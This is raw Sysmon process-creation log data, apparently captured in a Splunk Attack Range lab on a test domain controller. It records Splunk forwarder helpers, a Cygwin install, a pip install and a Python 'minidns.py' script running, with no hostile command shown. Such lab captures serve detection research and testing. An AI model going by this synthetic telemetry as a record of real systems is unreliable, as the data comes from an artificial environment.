14:55:53.504{A8622C2F-53F9-6078-C607-00000000AE01}4788C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-C507-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000044983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.496{A8622C2F-53F9-6078-C507-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C407-00000000AE01}5412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000044971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.488{A8622C2F-53F9-6078-C407-00000000AE01}5412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C307-00000000AE01}1392C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.480{A8622C2F-53F9-6078-C307-00000000AE01}1392C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044946Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.399{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe 
"/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000044174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:22.840{A8622C2F-53DA-6078-C007-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044154Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:20.767{A8622C2F-53D8-6078-BF07-00000000AE01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000044144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:20.090{A8622C2F-53D8-6078-BE07-00000000AE01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:19.427{A8622C2F-53D7-6078-BD07-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044119Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:17.505{A8622C2F-53D5-6078-BC07-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:16.823{A8622C2F-53D4-6078-BB07-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:16.234{A8622C2F-53D4-6078-BA07-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000043927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:34.135{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe-----"C:\Users\Administrator\Downloads\setup-x86_64.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7A8C030CA58900E52EFC55D3B617F443,SHA256=4DD4D4531E8E63ADE849DAAAF587BA1C1430368701772C8EE42A27F4E8C373E4,IMPHASH=00000000000000000000000000000000{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000043817Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:27.186{A8622C2F-53A3-6078-B807-00000000AE01}3332C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.48.125640979\886223015" -childID 7 -isForBrowser -prefsHandle 7160 -prefMapHandle 7260 -prefsLen 13178 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 872 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000043756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:22.817{A8622C2F-539E-6078-B707-00000000AE01}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043726Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:20.805{A8622C2F-539C-6078-B607-00000000AE01}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:20.237{A8622C2F-539C-6078-B507-00000000AE01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:19.575{A8622C2F-539B-6078-B407-00000000AE01}3148C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043643Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:17.723{A8622C2F-5399-6078-B307-00000000AE01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:17.041{A8622C2F-5399-6078-B207-00000000AE01}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:16.372{A8622C2F-5398-6078-B107-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:59.416{A8622C2F-5387-6078-B007-00000000AE01}5664C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exehostname -I C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-5387-6078-AF07-00000000AE01}5108C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000043560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:53:59.409{A8622C2F-5387-6078-AF07-00000000AE01}5108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5387-6078-AE07-00000000AE01}2424C:\Python27\python.exepython.exe c:\Temp\minidns.py 154100x800000000000000043552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:59.363{A8622C2F-5387-6078-AE07-00000000AE01}2424C:\Python27\python.exe-----python.exe c:\Temp\minidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043517Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:39.407{A8622C2F-5373-6078-AD07-00000000AE01}2572C:\Python27\python.exe-----python.exeC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:32.079{A8622C2F-536C-6078-AC07-00000000AE01}5516C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip.exe" install 
subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-536C-6078-AB07-00000000AE01}6768C:\Python27\Scripts\pip.exepip install subprocess 154100x800000000000000043488Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:32.071{A8622C2F-536C-6078-AB07-00000000AE01}6768C:\Python27\Scripts\pip.exe-----pip install subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043454Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:22.953{A8622C2F-5362-6078-AA07-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:21.009{A8622C2F-5361-6078-A907-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:20.341{A8622C2F-5360-6078-A807-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:19.667{A8622C2F-535F-6078-A707-00000000AE01}3156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043388Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:53:17.763{A8622C2F-535D-6078-A607-00000000AE01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:17.074{A8622C2F-535D-6078-A507-00000000AE01}6884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043368Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:16.425{A8622C2F-535C-6078-A407-00000000AE01}3012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042709Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:22.938{A8622C2F-5326-6078-A307-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:21.085{A8622C2F-5325-6078-A207-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 